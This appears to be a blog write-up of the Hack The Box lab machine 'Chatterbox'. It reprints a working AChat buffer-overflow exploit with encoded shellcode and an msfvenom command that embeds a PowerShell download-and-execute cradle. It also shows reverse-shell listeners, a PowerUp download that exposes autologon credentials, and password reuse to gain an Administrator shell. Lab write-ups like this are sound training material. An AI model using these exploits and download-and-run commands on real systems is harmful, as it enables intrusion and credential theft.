Chatterbox - Hack The Box
Synopsis
Chatterbox is a Easy difficulty windows machine. Intial foothold involves exploit a simple Buffer overflow
on AChat
applications. later we abuse file permission using icacls
to read the files inside Administrator
directory. Auto Login is enabled for Alfred
user. So, we can Obtain Auto login credential Using PowerUp. Next, by using the same password for Administrator
works and we can login as Administrator
.
Skills Required
- Python
- Powershell
- Windows Enumeration
Skills Learned
- Modifying public exploits
- Enumerating Window Registry
- Powershell reverse shell
Enumeration
Nmap
# Nmap 7.60 scan initiated Sat Apr 4 00:42:06 2020 as: nmap -Pn -sC -sV -v -p9255,9256 -o full.nmap chatterbox.htb
Nmap scan report for chatterbox.htb (10.10.10.74)
Host is up (0.54s latency).
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-favicon: Unknown favicon MD5: 0B6115FAE5429FEB9A494BEE6B18ABBE
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system
Looking at the nmap output we see http
runnig on port 92555
and its version is AChat chat system httpd
. On port 9526
we see achat
service running.
Doing searchsploit
for this application. It reveals that it is vulnerable to Remote Buffer Overflow
. Since we’re not aware of its version Initally we’re assuming its vulnerable.
Achat 0.150 beta7 - Remote Buffer Overflow | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | exploits/windows/remote/36056.rb
We’ve both a python
and metasploit
exploit for Achat
. we’ll work with the python
exploit. Now, we can copy the script by specifing -m(mirror)
flag to the searchsploit.
searchsploit -m exploits/windows/remote/36025.py
#!/usr/bin/python
import socket
import sys, time
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\
#x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\
#xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\
#xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=
#EAX -f python
#payload
<BUFFER payload>
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!"
i=0
while i<len(p):
if i > 172000:
time.sleep(1.0)
sent = sock.sendto(p[i:(i+8192)], server_address)
i += sent
sock.close()
There are few modifications need to be done before we make it work for us. This is a classic Buffer overflow
that allows us to overflow buffer and include our malicious shell code to get back reverse shell.
We can see the msfvenom
command in the script commented out. It helps us to generate buffer payload(buf value) including the bad characters to avoid. Sample payload shown in the code executes calc.exe
on the target machine. So, we’ll change the CMD
value to our convinience to get a reverse shell back to us.
We also need to change the server_address
to IP of chatterbox. There is some length limit of 1152
bytes on the payload. Anything that exceeds probably might not work. So, we need to keep that in mind while generating shell code using msfvenom.
Initial Foothold
we’ll generate the reverse shell payload using msfvenonm
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.17/Invoke-PowerShellTcp.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
After running msfvenom payload will be generated in the following way
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 704 (iteration=0)
x86/unicode_mixed chosen with final size 704
Payload size: 704 bytes
Final size of python file: 3432 bytes
buf = b"" buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
The resulted payload size is 704
bytes, so within the limit. Now we need to add this payload to the exploit. we’ll start our listener and http server to server powershell file to target inorder to get the reverse shell.
Running the exploit we get a reverse shell as Alfred
.
python Achat.py
---->{P00F}!
sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.74 - - [10/Apr/2020 01:02:53] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
sudo rlwrap ncat -lvnp 9001
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.74.
Ncat: Connection from 10.10.10.74:49158.
Windows PowerShell running as user Alfred on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
chatterbox\alfred
PS C:\users\alfred\desktop> (gc user.txt).substring(0,16)
72290246dfaedb1e
Privilege Escalation
We’ll start enumerating the user and possible privesc vectors.
Displaying Alfred
Account info.
PS C:\users\alfred\desktop> net user alfred
User name Alfred
Full Name
Comment
User's comment
Country code 001 (United States)
Account active Yes
Account expires Never
Password last set 12/10/2017 10:18:08 AM
Password expires Never
Password changeable 12/10/2017 10:18:08 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/9/2020 3:05:55 PM
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
Looking at other users on the system. we see three users on system including Alfred
.
PS C:\users\alfred\desktop> net users
User accounts for \\CHATTERBOX
-------------------------------------------------------------------------------
Administrator Alfred Guest
Having a look at privileges Alfred
has:
PS C:\users\alfred\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Looking at the systeminfo
. We observe that 208 hotfixes installed so it’s unlikely we can escalate privilege using a kernel exploit.
PS C:\users\alfred\desktop> systeminfo
Host Name: CHATTERBOX
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00371-223-0897461-86794
Original Install Date: 12/10/2017, 9:18:19 AM
System Boot Time: 4/9/2020, 3:05:42 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 2 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,501 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,370 MB
Virtual Memory: In Use: 725 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CHATTERBOX
Hotfix(s): 208 Hotfix(s) Installed.
Travesing over the directories . We observe that we have access to Administrator
directory. But we don’t have permission to view the root flag.
PS C:\users\Administrator\Desktop> gc root.txt
PS C:\users\Administrator\Desktop> Get-Content : Access to the path 'C:\users\Administrator\Desktop\root.txt' is d
enied.
At line:1 char:3
+ gc <<<< root.txt
+ CategoryInfo : PermissionDenied: (C:\users\Administrator\Deskto
p\root.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsof
t.PowerShell.Commands.GetContentCommand
Viewing the permission on root.txt
. We observer that only Administrator
has full access(F) on that file.
PS C:\users\administrator\desktop> icacls root.txt
root.txt CHATTERBOX\Administrator:(F)
Successfully processed 1 files; Failed processing 0 files
Since we’re able to enter into desktop
directory. let’s check our permissions on the directory
PS C:\users\administrator> icacls Desktop
Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
CHATTERBOX\Administrator:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CHATTERBOX\Alfred:(I)(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
We’ve full access(F) on the Desktop
directory .The Alfred
user also configured to own the root.txt
file.
So we can simply grant access to ourselves using icalcs
.
PS C:\users\administrator\desktop> icacls root.txt /grant alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files
And now we’re able to view the root.txt
file.
PS C:\users\administrator\desktop> (gc root.txt).substring(0,16)
a673d1b1fa95c276
Privilege escalation through Auto Login creds
We can run PowerUP.ps1
and perfom Invoke-AllChecks
to see any possible privesc vectors.
PS C:\tmp> IEX(New-Object Net.WebClient).downloadString("http://10.10.14.17/PowerUp.ps1")
PS C:\tmp> Invoke-AllChecks <SNIP>
DefaultDomainName :
DefaultUserName : Alfred
DefaultPassword : Welcome1!
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
<SNIP>
It reveals the Auto Login
is enabled for Alfred
user and its password is Welcome1!
. We can try same password for Administrator
and see if it works.
We’ll create a credential object for this purpose.
PS C:\tmp> $password = convertto-securestring -AsPlainText -Force -String "Welcome1!"
PS C:\tmp> $credential = new-object -typename System.Management.Automation.PSCredential -argumentlist "chatterbox\administrator",$password;
PS C:\tmp> $credential
UserName Password
-------- --------
chatterbox\administrator System.Security.SecureString
Now, we can pass this credential to Start-Process
and Invoke a powershell script from our machine to get reverse shell as administrator
.
PS C:\tmp> Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.17/Invoke-PowerShellTcp.ps1')" -Credential $credential
And we got reverse shell as Administrator
.
sudo rlwrap ncat -lnvp 9001
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.74.
Ncat: Connection from 10.10.10.74:49163.
Windows PowerShell running as user Administrator on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\tmp>whoami
chatterbox\administrator
PS C:\tmp> hostname
Chatterbox
Thank you for taking your time for reading this blog!.